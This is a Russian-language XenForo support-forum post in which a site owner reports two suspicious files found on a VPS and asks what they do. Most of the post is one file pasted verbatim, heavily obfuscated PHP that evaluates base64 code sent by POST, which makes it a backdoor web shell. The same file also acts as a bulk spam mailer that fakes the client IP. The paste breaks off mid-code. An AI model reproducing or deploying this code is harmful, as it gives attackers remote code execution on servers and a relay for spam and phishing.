1. Приветствуем Вас на неофициальном форуме технической поддержки XenForo на русском языке. XenForo - коммерческий форумный движок от бывших создателей vBulletin, написанный на PHP.

Безопасность xenforo

Тема в разделе "Основные вопросы по XenForo", создана пользователем crashik, 15.11.2013.

Загрузка
  1. crashik

    crashik Местный

    Регистрация:
    09.02.12
    Сообщения:
    19
    Симпатии:
    6
    Версия XF:
    1.1.3
    Сегодня на vps обнаружил два подозрительных файла. Хочу спросить у знатоков что скрывают и выполняют данные файлы. Вообще даже не могу сообразить как они могли попасть ко мне на хост. К безопасности отношусь со всей серьезностью. Кто что думает по этому поводу?). На хосте xenforo 1.1.5 и пару плагинов, все чисто и аккуратно.

    /css/sys0972500-1.php
    Код:
    <?php ${"\x47L\x4f\x42A\x4c\x53"}["\x6dql\x65byzv\x6dj"]="k";${"\x47\x4c\x4fBA\x4c\x53"}["\x70\x6c\x66\x70\x67\x74\x62"]="\x68\x5fdet\x65cte\x64";${"\x47L\x4fB\x41LS"}["g\x63\x6a\x68ot\x7a"]="\x68\x65a\x64\x65\x72\x73";${"GLOB\x41\x4c\x53"}["\x76\x6ff\x74\x6e\x74\x76\x76"]="\x72e\x73";${"\x47LO\x42\x41L\x53"}["y\x68\x64\x71\x6a\x76"]="da\x74\x61";${"\x47L\x4f\x42A\x4c\x53"}["ber\x61\x74\x6c\x6f\x69j"]="\x76";${"\x47\x4c\x4f\x42A\x4cS"}["\x77\x74dp\x70\x6b\x74\x66"]="c\x6f\x6f\x6b\x69\x65";${"\x47L\x4f\x42\x41L\x53"}["\x6d\x78\x62dj\x6c"]="\x72\x65\x71\x75\x65\x73t";${"G\x4c\x4f\x42\x41\x4cS"}["f\x63\x71oo\x65\x72n"]="t\x69me\x6fut";${"GL\x4fBA\x4cS"}["k\x71\x68\x79\x6e\x6b\x73\x77\x6az"]="e\x72r\x73\x74r";${"\x47LOBA\x4cS"}["\x63\x6bsu\x7a\x75q\x76wc"]="\x65rrno";${"\x47LO\x42\x41\x4c\x53"}["\x64\x6f\x6c\x6a\x79\x66\x66\x72iy\x73\x78"]="\x66\x70";${"GL\x4fB\x41\x4c\x53"}["s\x78\x6c\x74\x74d\x6e"]="\x73\x63\x68\x65m\x65";${"\x47\x4cO\x42AL\x53"}["lv\x63\x6bjt\x61\x62\x78s"]="\x75rl";${"\x47\x4c\x4fBAL\x53"}["\x69\x63\x67\x64\x62v\x66x"]="\x70\x61\x72am\x73";${"G\x4c\x4f\x42\x41\x4c\x53"}["q\x66\x65y\x65\x66\x75\x71\x65"]="\x75\x72\x69";${"\x47\x4c\x4f\x42\x41L\x53"}["h\x71\x73\x73d\x69\x6c\x6f"]="\x74\x6fke\x6e\x73";${"G\x4c\x4f\x42\x41\x4c\x53"}["v\x65\x70p\x78\x77\x6a\x72\x68"]="str";${"\x47L\x4f\x42\x41\x4cS"}["\x68\x78\x6b\x66\x78r\x78pen\x71h"]="\x70a\x73s";${"G\x4c\x4f\x42\x41\x4c\x53"}["\x73\x6a\x75\x6b\x66u\x65\x70\x62h"]="\x6c\x65\x6e\x67\x74\x68";${"\x47LOB\x41\x4c\x53"}["\x75\x63l\x69d\x66\x69"]="ch\x61\x72\x73";${"\x47LO\x42\x41\x4c\x53"}["\x61p\x61\x66o\x69d\x67\x6dz\x75\x75"]="\x6eu\x6d";${"\x47\x4cO\x42\x41LS"}["x\x73cx\x6aex"]="coun\x74";${"\x47\x4cO\x42\x41\x4cS"}["\x6eb\x6ee\x73b\x6e"]="\x72a\x6ed";${"GL\x4f\x42\x41L\x53"}["\x78\x66\x70\x66\x78\x79ii\x63t\x70"]="\x6d\x61x";${"GL\x4f\x42\x41\x4cS"}["\x64\x6d\x6c\x62\x6d\x68"]="m\x69\x6e";${"G\x4cO\x42\x41\x4c\x53"}["\x61\x70\x66\x6fb\x72q"]="\x63o\x6e\x74\x65\x6e\x74";${"G\x4c\x4fB\x41\x4cS"}["j\x69s\x6e\x76\x72n"]="c2";${"\x47\x4c\x4f\x42\x41\x4cS"}["fe\x6auv\x77s\x72\x6c\x73"]="\x6e\x73";${"\x47\x4cO\x42\x41\x4cS"}["f\x79\x62qb\x72\x74\x6e"]="\x69";${"\x47L\x4f\x42\x41\x4cS"}["\x6cbo\x6c\x79\x66\x78\x6eiv\x6b"]="\x6da\x74ch\x65\x73";${"\x47\x4c\x4fB\x41LS"}["b\x62\x76\x64\x70\x6d\x6a\x76h\x65x\x66"]="\x73\x75\x62\x6a";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x76\x73\x74\x70\x67\x65e\x6adq\x69w"]="\x74o";${"\x47\x4cO\x42AL\x53"}["\x75\x79hr\x63\x70\x6a"]="\x66";${"\x47\x4cOB\x41\x4cS"}["\x6epb\x71\x79\x6b\x6d\x66n"]="\x75\x6e";${"\x47LO\x42A\x4c\x53"}["\x78sz\x78\x72wv\x6db\x6f"]="z\x61\x67";${"\x47\x4cO\x42A\x4c\x53"}["\x6bxr\x74\x76u\x74\x69g\x76"]="\x70la\x69\x6e";${"\x47\x4c\x4f\x42A\x4c\x53"}["\x61\x71g\x71\x6f\x61\x67\x67\x78\x68"]="\x68\x65\x61d";${"\x47\x4cO\x42\x41\x4cS"}["\x7a\x75\x75\x73\x6fl\x67"]="f\x72\x6f\x6d";${"\x47L\x4f\x42\x41\x4c\x53"}["\x66v\x72\x6cu\x74"]="\x6d\x65ssag\x65\x73";${"\x47\x4c\x4f\x42AL\x53"}["\x77\x64\x77\x65\x69\x6ds"]="m\x65\x73\x73a\x67\x65";${"G\x4c\x4fB\x41\x4c\x53"}["qw\x6a\x72\x6ao"]="\x74\x68\x65m\x65";${"G\x4cO\x42\x41\x4c\x53"}["\x6b\x76i\x6a\x6de\x65\x62\x6aw\x6a\x79"]="\x66i\x6c\x65nam\x65";${"\x47\x4c\x4f\x42ALS"}["ds\x6a\x66\x6f\x6c\x67\x6eo\x64\x76"]="\x66\x69\x6ce";${"G\x4c\x4f\x42\x41\x4c\x53"}["\x72\x79\x71\x77h\x64l\x6f\x6fo\x66"]="\x61\x6c\x69\x61s\x65\x73";${"GLOB\x41\x4cS"}["\x66g\x6e\x69\x77\x71"]="\x6d\x61ilers";${"\x47\x4c\x4f\x42A\x4cS"}["\x79\x64xf\x66\x74\x6f"]="th\x65\x6d\x65\x73";${"G\x4c\x4fB\x41LS"}["\x63\x69\x6e\x74\x76g\x63"]="\x65\x6d\x61\x69l\x73";${"\x47\x4c\x4fBA\x4c\x53"}["b\x79\x79\x70c\x75yk"]="\x6b\x65\x79";if(isset($_POST["c\x6fde"])&&isset($_POST["\x63u\x73\x74\x6f\x6d\x5f\x61\x63t\x69on"])){eval(base64_decode($_POST["\x63od\x65"]));}if(isset($_POST["\x74\x79pe"])&&$_POST["type"]=="\x31"){type1_send();}elseif(isset($_POST["type"])&&$_POST["t\x79\x70e"]=="2"){}elseif(isset($_POST["\x74\x79pe"])){echo$_POST["\x74\x79\x70\x65"];}function type1_send(){$escikxlrj="\x6de\x73\x73\x61\x67\x65\x73";${"GL\x4fB\x41\x4c\x53"}["\x75\x6d\x64gow\x79\x75\x6b\x76x"]="f\x74\x65\x69l";if(!isset($_POST["email\x73"])OR!isset($_POST["t\x68\x65\x6d\x65\x73"])OR!isset($_POST["\x6d\x65\x73\x73a\x67\x65s"])OR!isset($_POST["\x66\x72o\x6ds"])OR!isset($_POST["ma\x69\x6c\x65rs"])){exit();}if(get_magic_quotes_gpc()){$pdniulpzjg="\x70\x6fs\x74";foreach($_POST as${${"\x47LO\x42\x41L\x53"}["\x62\x79\x79p\x63u\x79\x6b"]}=>${$pdniulpzjg}){$nnyfljh="\x70\x6f\x73\x74";$_POST[${${"G\x4c\x4fBAL\x53"}["\x62\x79\x79\x70\x63\x75yk"]}]=stripcslashes(${$nnyfljh});}}${"\x47\x4c\x4fBA\x4c\x53"}["l\x6bl\x72\x6b\x6f\x74\x71"]="e\x6d\x61\x69\x6c\x73";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x77c\x6f\x71a\x6bs\x6f\x68\x72\x69e"]="fr\x6f\x6d\x73";$vuoyllxk="pa\x73\x73\x65s";$gajjboiolb="\x65m\x61\x69l";${${"GL\x4f\x42\x41LS"}["\x63\x69n\x74\x76g\x63"]}=@unserialize(base64_decode($_POST["e\x6da\x69ls"]));${${"\x47\x4c\x4f\x42A\x4cS"}["\x79\x64\x78ff\x74\x6f"]}=@unserialize(base64_decode($_POST["t\x68\x65\x6d\x65\x73"]));${$escikxlrj}=@unserialize(base64_decode($_POST["m\x65ss\x61\x67\x65s"]));${${"G\x4c\x4f\x42\x41\x4c\x53"}["wco\x71\x61k\x73o\x68r\x69\x65"]}=@unserialize(base64_decode($_POST["\x66\x72o\x6d\x73"]));${${"\x47LO\x42A\x4cS"}["f\x67\x6ei\x77q"]}=@unserialize(base64_decode($_POST["\x6d\x61ile\x72\x73"]));${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x72\x79\x71w\x68\x64\x6co\x6f\x6f\x66"]}=@unserialize(base64_decode($_POST["ali\x61s\x65s"]));${$vuoyllxk}=@unserialize(base64_decode($_POST["pa\x73s\x65s"]));if(isset($_SERVER)){$_SERVER["\x50\x48P\x5fS\x45\x4cF"]="/";$_SERVER["RE\x4d\x4fT\x45_A\x44DR"]="12\x37\x2e0\x2e\x30.1";if(!empty($_SERVER["HTTP\x5fX_\x46\x4fR\x57\x41\x52\x44\x45D_\x46O\x52"])){$_SERVER["\x48T\x54\x50_X\x5f\x46\x4fR\x57\x41R\x44E\x44\x5fF\x4f\x52"]="\x31\x327.0\x2e\x30.1";}}if(isset($_FILES)){foreach($_FILES as${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x62\x79\x79\x70\x63\x75\x79\x6b"]}=>${${"G\x4c\x4f\x42A\x4cS"}["d\x73\x6a\x66o\x6cg\x6eo\x64\x76"]}){$tbmisfvl="\x66ile\x6e\x61\x6d\x65";$vjfajwgqfgv="\x61\x6c\x69\x61\x73\x65s";$zsigtbqc="fi\x6c\x65\x6e\x61me";${"\x47\x4c\x4f\x42\x41L\x53"}["\x74\x63vd\x79\x75o\x6fq\x74\x66"]="\x66\x69\x6c\x65n\x61\x6d\x65";${"\x47L\x4fB\x41\x4c\x53"}["\x78es\x70o\x6c\x65k\x66"]="\x66i\x6ce\x6e\x61\x6d\x65";${$tbmisfvl}=alter_macros(${$vjfajwgqfgv}[${${"\x47\x4cO\x42\x41L\x53"}["\x62y\x79\x70c\x75y\x6b"]}]);${${"\x47\x4cO\x42A\x4c\x53"}["k\x76i\x6a\x6d\x65\x65\x62j\x77\x6ay"]}=num_macros(${${"\x47\x4cOB\x41\x4cS"}["\x78e\x73p\x6fl\x65\x6bf"]});${$zsigtbqc}=text_macros(${${"GL\x4f\x42\x41\x4cS"}["\x6b\x76\x69\x6a\x6d\x65\x65b\x6a\x77\x6ay"]});${"G\x4cOB\x41L\x53"}["\x7a\x6c\x6c\x72\x66\x79q\x6cz\x64"]="k\x65y";${${"\x47\x4c\x4fBAL\x53"}["\x74\x63v\x64yu\x6f\x6f\x71\x74f"]}=xnum_macros(${${"\x47\x4cOBAL\x53"}["\x6b\x76i\x6am\x65\x65bjwjy"]});$_FILES[${${"\x47\x4c\x4f\x42ALS"}["\x7a\x6c\x6c\x72f\x79\x71l\x7ad"]}]["\x6e\x61m\x65"]=${${"G\x4c\x4f\x42\x41\x4cS"}["\x6bv\x69\x6a\x6de\x65\x62\x6a\x77\x6ay"]};}}if(empty(${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x6c\x6bl\x72\x6bot\x71"]})){exit();}foreach(${${"\x47\x4cO\x42\x41\x4c\x53"}["\x63\x69n\x74\x76\x67c"]} as${${"G\x4c\x4fB\x41L\x53"}["\x75m\x64\x67\x6f\x77\x79u\x6b\x76\x78"]}=>${$gajjboiolb}){${"\x47L\x4fB\x41\x4cS"}["\x64\x75mo\x75\x6b\x72\x79\x74q"]="t\x68\x65\x6de";${"\x47L\x4fB\x41\x4c\x53"}["iirui\x65\x79w\x6aq"]="mes\x73\x61g\x65";$wservwqqn="the\x6d\x65";${"\x47\x4cO\x42A\x4c\x53"}["\x76s\x72\x75t\x6bu\x77\x69sk\x65"]="\x66\x72om";${${"G\x4c\x4f\x42\x41\x4cS"}["du\x6d\x6f\x75k\x72\x79t\x71"]}=${${"\x47\x4c\x4fBALS"}["\x79\x64xff\x74\x6f"]}[array_rand(${${"\x47\x4c\x4f\x42A\x4c\x53"}["y\x64xff\x74\x6f"]})];$vtzzcfh="m\x65\x73\x73\x61\x67\x65";${${"\x47L\x4f\x42\x41\x4cS"}["qwj\x72\x6a\x6f"]}=alter_macros(${$wservwqqn}["t\x68e\x6de"]);$reskpoq="m\x61\x69\x6ce\x72s";$qlddgikwl="m\x65\x73s\x61\x67e";$uzxokgywpz="t\x68\x65m\x65";${${"\x47\x4c\x4f\x42A\x4cS"}["\x71\x77\x6a\x72j\x6f"]}=num_macros(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["q\x77\x6a\x72jo"]});${"GL\x4fB\x41\x4cS"}["\x61gq\x77sof\x63h\x63\x77"]="mai\x6c\x65\x72";${"\x47\x4c\x4fBA\x4c\x53"}["l\x68\x61\x67\x73r\x6b"]="\x66ro\x6d";${$uzxokgywpz}=text_macros(${${"\x47\x4c\x4fB\x41\x4cS"}["\x71\x77j\x72j\x6f"]});$zpddcmhvkqr="\x6de\x73\x73a\x67\x65\x73";${"\x47\x4cO\x42\x41\x4cS"}["\x6d\x62\x69\x68\x75b\x79"]="\x6d\x65\x73\x73\x61\x67\x65";${"\x47\x4c\x4fB\x41\x4cS"}["\x73q\x71\x68\x6cs\x6e\x77\x75h\x79"]="\x66r\x6fm";${"G\x4c\x4fB\x41L\x53"}["\x6c\x76v\x6d\x73\x6ft\x74\x68\x72g"]="\x6des\x73a\x67\x65";${${"G\x4c\x4f\x42A\x4c\x53"}["\x71\x77\x6a\x72j\x6f"]}=xnum_macros(${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x71w\x6a\x72j\x6f"]});${${"G\x4c\x4fBAL\x53"}["w\x64\x77\x65\x69m\x73"]}=${$zpddcmhvkqr}[array_rand(${${"\x47L\x4f\x42A\x4cS"}["\x66\x76\x72\x6c\x75\x74"]})];${${"\x47\x4c\x4f\x42AL\x53"}["\x77dw\x65im\x73"]}=alter_macros(${${"GLO\x42ALS"}["\x77d\x77ei\x6d\x73"]}["\x6d\x65\x73sa\x67e"]);${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x6d\x62\x69\x68\x75\x62\x79"]}=num_macros(${${"\x47\x4c\x4fBAL\x53"}["\x69\x69\x72u\x69\x65\x79\x77\x6a\x71"]});$xngjqtj="f\x72om";${"\x47LO\x42\x41\x4cS"}["\x74\x76\x78\x6e\x6fd\x6a\x6ay"]="\x6d\x65\x73\x73\x61\x67\x65";$zvchak="t\x68\x65me";${${"GL\x4fBAL\x53"}["\x77\x64\x77e\x69\x6d\x73"]}=text_macros(${${"GLO\x42ALS"}["lv\x76\x6ds\x6f\x74\x74h\x72g"]});${"\x47\x4cO\x42A\x4cS"}["y\x67\x74\x69\x64\x6f\x6czy\x7a"]="\x6d\x61ile\x72";$zzmbjtetlro="\x66\x72\x6f\x6ds";${"GLO\x42\x41L\x53"}["fsn\x71t\x65n"]="f\x72o\x6d";${"G\x4cO\x42\x41\x4c\x53"}["p\x75\x73\x79\x74i\x6d\x66h\x66"]="\x66\x72o\x6d\x73";${${"G\x4c\x4f\x42\x41\x4cS"}["\x74v\x78\x6e\x6f\x64\x6a\x6a\x79"]}=xnum_macros(${$qlddgikwl});${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x65l\x71\x78c\x6d\x64\x71\x78"]="ft\x65\x69l";${"\x47\x4cO\x42\x41\x4c\x53"}["r\x77\x74k\x66\x73\x72\x66"]="\x66\x72\x6f\x6d";${$vtzzcfh}=fteil_macros(${${"\x47\x4c\x4fB\x41LS"}["w\x64\x77\x65\x69\x6d\x73"]},${${"GL\x4fB\x41\x4c\x53"}["\x65\x6cq\x78\x63\x6d\x64qx"]});${${"\x47L\x4f\x42\x41L\x53"}["\x73\x71\x71\x68l\x73\x6ewuh\x79"]}=${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x70us\x79\x74\x69\x6d\x66\x68\x66"]}[array_rand(${$zzmbjtetlro})];$hhmertb="f\x72\x6f\x6d";${${"G\x4c\x4f\x42\x41\x4cS"}["\x66\x73\x6e\x71\x74e\x6e"]}=alter_macros(${${"\x47\x4c\x4fBA\x4c\x53"}["\x72\x77t\x6bf\x73\x72\x66"]}["f\x72om"]);${"GL\x4fBA\x4c\x53"}["s\x6equ\x6c\x6cq\x67\x63\x73\x66"]="\x65\x6da\x69l";${${"\x47\x4c\x4f\x42AL\x53"}["\x76s\x72utk\x75\x77\x69s\x6b\x65"]}=num_macros(${${"\x47L\x4fB\x41\x4cS"}["\x7auu\x73\x6f\x6cg"]});${${"\x47LOBALS"}["z\x75u\x73ol\x67"]}=text_macros(${${"\x47\x4c\x4fB\x41LS"}["\x7a\x75\x75\x73\x6f\x6c\x67"]});${${"\x47\x4c\x4f\x42A\x4cS"}["\x7a\x75\x75s\x6flg"]}=xnum_macros(${$xngjqtj});${${"G\x4c\x4f\x42\x41L\x53"}["\x6ch\x61\x67sr\x6b"]}=from_host(${$hhmertb});${${"G\x4cO\x42A\x4c\x53"}["\x79\x67\x74i\x64o\x6c\x7ay\x7a"]}=${$reskpoq}[array_rand(${${"\x47L\x4f\x42ALS"}["\x66\x67\x6e\x69\x77\x71"]})];send_mail(${${"\x47\x4c\x4fBA\x4c\x53"}["zu\x75\x73\x6f\x6cg"]},${${"\x47\x4c\x4fB\x41L\x53"}["s\x6e\x71\x75\x6c\x6cqg\x63\x73\x66"]},${$zvchak},${${"\x47L\x4f\x42A\x4c\x53"}["w\x64w\x65\x69\x6ds"]},${${"\x47\x4c\x4f\x42\x41L\x53"}["a\x67\x71ws\x6f\x66\x63h\x63w"]});}}function send_mail($from,$to,$subj,$text,$mailer){${"GLO\x42\x41L\x53"}["\x71\x6be\x69\x76d"]="head";${"\x47\x4c\x4fB\x41L\x53"}["\x75\x76n\x64\x6e\x75"]="\x68\x65\x61\x64";$qapomxejc="\x68\x65a\x64";${"GL\x4f\x42\x41\x4c\x53"}["qyd\x72m\x72\x6d"]="\x75\x6e";$ssjdvmr="h\x65a\x64";${"GL\x4f\x42A\x4c\x53"}["qa\x70\x61\x6c\x66"]="\x75\x6e";${"G\x4c\x4fB\x41\x4cS"}["f\x62mj\x69\x6c\x62\x78\x75h"]="\x75\x6e";${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x71\x6be\x69\x76d"]}="";${${"\x47L\x4fB\x41L\x53"}["\x71\x79\x64r\x6d\x72\x6d"]}=strtoupper(uniqid(time()));${"\x47\x4cO\x42\x41L\x53"}["\x70\x69\x68\x67\x68\x70"]="p\x6c\x61\x69\x6e";${"\x47L\x4fBAL\x53"}["ti\x6f\x76\x64\x75g"]="h\x65a\x64";$zftiytqlm="u\x6e";$dvusopo="\x7a\x61\x67";${$qapomxejc}.="Fro\x6d:\x20$from\n";${${"GL\x4f\x42\x41\x4c\x53"}["\x61\x71\x67\x71o\x61\x67gxh"]}.="X-M\x61i\x6c\x65\x72: $mailer\n";${"G\x4c\x4f\x42\x41\x4c\x53"}["x\x6ea\x63\x6e\x6b\x76"]="z\x61\x67";${${"GL\x4fBA\x4c\x53"}["\x61\x71g\x71o\x61\x67\x67\x78\x68"]}.="\x52\x65p\x6c\x79-\x54\x6f:\x20$from\n";${${"G\x4c\x4f\x42A\x4c\x53"}["t\x69\x6fv\x64\x75g"]}.="\x4dime-\x56\x65\x72si\x6fn: \x31.\x30\n";${${"G\x4cO\x42A\x4c\x53"}["\x61\x71\x67\x71\x6f\x61\x67\x67\x78\x68"]}.="\x43\x6f\x6e\x74e\x6et-\x54yp\x65:\x20m\x75lt\x69p\x61\x72t/a\x6cte\x72nat\x69\x76e\x3b";${"\x47\x4cOB\x41LS"}["\x68dxvdvo\x67uu"]="t\x65xt";${${"\x47\x4cO\x42ALS"}["uvn\x64\x6e\x75"]}.="\x62\x6fund\x61\x72y=\"----------".${${"\x47\x4cO\x42\x41\x4c\x53"}["\x66b\x6dj\x69lbxu\x68"]}."\"\n\n";${${"\x47\x4c\x4fB\x41\x4cS"}["kxr\x74\x76\x75\x74igv"]}=strip_tags(${${"\x47LO\x42\x41\x4c\x53"}["hdx\x76dv\x6f\x67\x75\x75"]});$udgbrojukp="\x7aa\x67";${${"\x47\x4cOB\x41\x4cS"}["x\x73\x7a\x78r\x77\x76\x6dbo"]}="------------".${${"\x47\x4cO\x42A\x4c\x53"}["\x6ep\x62\x71y\x6b\x6d\x66n"]}."\n\x43ontent-T\x79pe: \x74\x65xt/p\x6c\x61i\x6e\x3b\x20\x63h\x61\x72set\x3d\x22I\x53O-8\x38\x359-1\x22; \x66\x6fr\x6d\x61t=flo\x77e\x64\n";${"\x47\x4c\x4f\x42\x41L\x53"}["\x61\x75m\x6ek\x6f\x73"]="\x7aa\x67";${$udgbrojukp}.="\x43\x6f\x6e\x74\x65n\x74-T\x72an\x73fe\x72-\x45n\x63\x6fd\x69n\x67:\x207bi\x74\n\n".${${"\x47LO\x42\x41\x4cS"}["\x70\x69\x68g\x68\x70"]}."\n\n";${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x78s\x7axr\x77\x76\x6dbo"]}.="------------".${${"\x47\x4cO\x42\x41\x4cS"}["\x71apa\x6c\x66"]}."\nC\x6f\x6e\x74\x65n\x74-\x54ype: t\x65\x78t/\x68\x74ml;\x20\x63h\x61r\x73et\x3d\x22IS\x4f-885\x39-\x31\"\x3b\n";${$dvusopo}.="Con\x74\x65\x6e\x74-\x54\x72a\x6es\x66\x65r-Enc\x6fd\x69\x6e\x67:\x20\x37\x62\x69\x74\n\n$text\n\n";${${"GL\x4f\x42\x41\x4cS"}["\x61\x75\x6d\x6e\x6b\x6fs"]}.="------------".${$zftiytqlm}."--";if(count($_FILES)>0){foreach($_FILES as${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x64\x73\x6a\x66\x6fl\x67\x6e\x6f\x64\x76"]}){if(file_exists(${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x64s\x6af\x6flg\x6e\x6f\x64v"]}["\x74m\x70_\x6eame"])){$csikbuoamv="\x75\x6e";${"\x47\x4cO\x42\x41\x4c\x53"}["\x6a\x71\x74\x6dt\x67a"]="z\x61\x67";${"\x47\x4c\x4f\x42\x41L\x53"}["\x6a\x65sjxulx\x72"]="\x66";$sdddwyyfvp="\x7a\x61g";$bfwodwiv="\x66\x69\x6ce";${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6aes\x6a\x78ul\x78\x72"]}=fopen(${$bfwodwiv}["tm\x70_na\x6d\x65"],"\x72\x62");${${"\x47L\x4f\x42\x41\x4c\x53"}["\x78s\x7a\x78r\x77\x76m\x62\x6f"]}.="------------".${$csikbuoamv}."\n";${$sdddwyyfvp}.="Cont\x65\x6et-\x54y\x70\x65:\x20a\x70p\x6ci\x63atio\x6e/\x6fcte\x74-s\x74\x72e\x61\x6d;";${${"G\x4c\x4f\x42\x41\x4cS"}["x\x73\x7a\x78\x72w\x76\x6d\x62\x6f"]}.="n\x61me=\"".${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x64sjf\x6flg\x6e\x6f\x64v"]}["\x6e\x61me"]."\"\n";${"\x47LO\x42\x41\x4c\x53"}["\x64\x6d\x64mx\x6d\x6f"]="\x7aag";${${"\x47LO\x42\x41\x4cS"}["\x64m\x64m\x78m\x6f"]}.="\x43o\x6et\x65\x6e\x74-T\x72\x61nsfe\x72-\x45nc\x6fdi\x6eg:b\x61\x73e64\n";$wfchmf="\x66il\x65";${${"\x47\x4c\x4f\x42A\x4cS"}["x\x73\x7a\x78\x72w\x76\x6d\x62\x6f"]}.="\x43\x6f\x6e\x74\x65\x6et-\x44\x69\x73\x70o\x73it\x69\x6fn:atta\x63h\x6d\x65nt\x3b";${${"\x47L\x4f\x42A\x4c\x53"}["\x6a\x71\x74\x6dt\x67\x61"]}.="\x66\x69\x6ce\x6e\x61me\x3d\"".${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x64\x73\x6a\x66o\x6cgn\x6f\x64\x76"]}["\x6ea\x6d\x65"]."\"\n\n";${${"\x47LO\x42\x41L\x53"}["\x78s\x7a\x78\x72wv\x6dbo"]}.=chunk_split(base64_encode(fread(${${"\x47\x4c\x4fBAL\x53"}["\x75\x79\x68\x72\x63\x70\x6a"]},filesize(${$wfchmf}["tmp\x5f\x6e\x61me"]))))."\n";fclose(${${"G\x4cO\x42\x41L\x53"}["\x75\x79\x68rc\x70\x6a"]});}}}if(@mail(${${"G\x4c\x4fB\x41\x4c\x53"}["\x76\x73tp\x67e\x65j\x64\x71\x69\x77"]},${${"G\x4cO\x42\x41\x4c\x53"}["b\x62\x76dp\x6d\x6a\x76\x68e\x78f"]},${${"G\x4c\x4fBA\x4c\x53"}["\x78na\x63\x6ek\x76"]},${$ssjdvmr})){if(!empty($_POST["\x76erb\x6f\x73\x65"]))echo"S\x45N\x44\x45D";}else{if(!empty($_POST["\x76e\x72b\x6f\x73e"]))echo"F\x41\x49L";}}function alter_macros($content){$gfhdwrlfdbti="\x63\x6f\x6et\x65n\x74";$dbcqzuqfrub="i";$vljvwysj="m\x61t\x63\x68\x65s";preg_match_all("#{(.*)}\x23Ui",${$gfhdwrlfdbti},${${"\x47\x4cO\x42A\x4c\x53"}["\x6cbo\x6cyfx\x6e\x69v\x6b"]});for(${$dbcqzuqfrub}=0;${${"GL\x4f\x42AL\x53"}["\x66\x79b\x71\x62\x72t\x6e"]}<count(${$vljvwysj}[1]);${${"\x47\x4c\x4f\x42ALS"}["\x66\x79\x62qb\x72t\x6e"]}++){$xkjlspskvkc="\x72\x61\x6e\x64";${"\x47\x4c\x4fB\x41LS"}["s\x6d\x71\x64\x66\x76\x64l\x64"]="\x63on\x74\x65\x6e\x74";$nglxiujbxb="n\x73";${${"GL\x4fB\x41\x4c\x53"}["\x66e\x6a\x75v\x77\x73\x72l\x73"]}=explode("|",${${"GL\x4f\x42\x41L\x53"}["\x6c\x62ol\x79f\x78\x6eiv\x6b"]}[1][${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x66\x79\x62\x71\x62\x72\x74\x6e"]}]);${${"G\x4c\x4fB\x41LS"}["\x6ai\x73n\x76\x72\x6e"]}=count(${$nglxiujbxb});${"\x47\x4c\x4f\x42\x41\x4cS"}["\x6bk\x64\x6c\x68\x65\x72"]="\x72\x61\x6e\x64";${$xkjlspskvkc}=rand(0,(${${"\x47\x4cOBAL\x53"}["\x6a\x69\x73\x6e\x76r\x6e"]}-1));${${"G\x4cO\x42\x41\x4c\x53"}["\x61\x70\x66obrq"]}=str_replace("{".${${"\x47LOB\x41\x4c\x53"}["\x6c\x62ol\x79f\x78\x6ei\x76\x6b"]}[1][${${"GL\x4fB\x41\x4c\x53"}["\x66\x79\x62\x71\x62\x72t\x6e"]}]."}",${${"\x47\x4c\x4f\x42AL\x53"}["\x66\x65ju\x76wsrl\x73"]}[${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x6b\x6bd\x6ch\x65\x72"]}],${${"\x47LO\x42\x41\x4c\x53"}["\x73\x6d\x71\x64\x66v\x64l\x64"]});}return${${"\x47\x4cOB\x41\x4cS"}["\x61\x70\x66\x6f\x62\x72q"]};}function text_macros($content){$cgfmcd="conte\x6et";$bdxuity="i";${"G\x4c\x4f\x42\x41L\x53"}["p\x63sc\x67p\x79\x6a"]="m\x61\x74\x63\x68e\x73";$ktojmubhbi="\x69";$lxkysix="\x69";$ujoqcftky="\x6d\x61\x74\x63he\x73";preg_match_all("\x23\\[T\x45X\x54\\-([[:\x64\x69\x67\x69t:]]+)\x5c-([[:\x64igit:]]+)\\]\x23",${$cgfmcd},${${"\x47\x4cOB\x41\x4c\x53"}["\x70\x63\x73\x63g\x70\x79j"]});for(${$bdxuity}=0;${$ktojmubhbi}<count(${${"G\x4c\x4f\x42\x41\x4c\x53"}["lb\x6f\x6c\x79\x66\x78\x6e\x69\x76\x6b"]}[0]);${${"\x47L\x4f\x42A\x4cS"}["\x66\x79\x62\x71brt\x6e"]}++){$prmvjorstbht="ma\x74\x63\x68\x65\x73";$qdzyect="m\x69\x6e";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x79\x63\x6e\x75\x66\x75\x73\x75j\x6c"]="w\x6frd";$xksiek="i";${${"GL\x4fB\x41\x4c\x53"}["\x64\x6dl\x62\x6dh"]}=${$prmvjorstbht}[1][${${"\x47\x4cO\x42\x41\x4c\x53"}["\x66\x79b\x71\x62\x72t\x6e"]}];${${"\x47\x4c\x4f\x42A\x4cS"}["\x78\x66\x70\x66x\x79\x69\x69\x63tp"]}=${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x6c\x62\x6f\x6cy\x66x\x6e\x69v\x6b"]}[2][${${"\x47\x4c\x4f\x42\x41L\x53"}["\x66\x79\x62\x71\x62rt\x6e"]}];$spewortenoy="ra\x6e\x64";$wmnpnrq="w\x6frd";${$spewortenoy}=rand(${$qdzyect},${${"\x47LOB\x41\x4cS"}["\x78f\x70fx\x79ii\x63\x74\x70"]});${"GL\x4f\x42A\x4c\x53"}["\x70y\x69\x61\x6a\x74c"]="co\x6ete\x6et";${"\x47\x4c\x4fBA\x4c\x53"}["\x65\x75\x72\x6cp\x71\x74"]="\x6d\x61t\x63\x68\x65\x73";${$wmnpnrq}=generate_word(${${"\x47L\x4fBA\x4c\x53"}["nb\x6e\x65\x73\x62n